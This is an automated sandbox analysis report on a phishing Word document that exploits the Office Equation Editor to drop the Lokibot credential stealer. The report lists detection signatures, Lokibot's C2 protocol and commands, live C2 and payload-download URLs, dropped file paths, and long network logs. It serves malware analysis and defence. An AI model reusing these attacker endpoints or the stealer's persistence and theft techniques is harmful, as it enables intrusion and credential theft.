Windows Analysis Report
SCB REmittance Advice.doc

Overview

General Information

Sample name: SCB REmittance Advice.doc
Analysis ID: 1446718
MD5: a19ff7526e4447064c95123087783231
SHA1: 28cd27bb7050fb4f5534f584b83ca3be90d64ac8
SHA256: bc6fe96306eb0dcd81bbe50db9e9996b01ca39b22efa79fce253d38532353051
Tags: doc
Infos:

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected Lokibot
.NET source code contains potential unpacker
.NET source code contains very large strings
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches the installation path of Mozilla Firefox
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Loki Password Stealer (PWS), LokiBot "Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

AV Detection

barindex
Source: http://kbfvzoboss.bid/alien/fre.php URL Reputation: Label: malware
Source: http://alphastand.top/alien/fre.php URL Reputation: Label: malware
Source: http://alphastand.win/alien/fre.php URL Reputation: Label: malware
Source: http://alphastand.trade/alien/fre.php URL Reputation: Label: malware
Source: https://universalmovies.top/sharonzx.exe Avira URL Cloud: Label: phishing
Source: http://rocheholding.top/evie3/five/fre.php Avira URL Cloud: Label: malware
Source: https://universalmovies.top/ Avira URL Cloud: Label: phishing
Source: https://universalmovies.top/sharonzx.exeoC: Avira URL Cloud: Label: phishing
Source: https://universalmovies.top/sharonzx.exej Avira URL Cloud: Label: phishing
Source: https://universalmovies.top/sharonzx.exemmC: Avira URL Cloud: Label: phishing
Source: rocheholding.top/evie3/five/fre.php Avira URL Cloud: Label: malware
Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "rocheholding.top/evie3/five/fre.php"]}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharonzx[1].exe ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy) ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Roaming\sharon38892.exe ReversingLabs: Detection: 41%
Source: SCB REmittance Advice.doc ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharonzx[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Joe Sandbox ML: detected

Exploits

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 104.21.74.191 Port: 443 Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\sharon38892.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\sharon38892.exe Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: Binary string: XRoS.pdb source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr
Source: Binary string: XRoS.pdbSHA256 source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 4x nop then jmp 046F18B1h 5_2_046F1B78
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 4x nop then jmp 01F50FF1h 14_2_01F512B4
Source: global traffic DNS query: name: universalmovies.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic DNS query: name: rocheholding.top
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
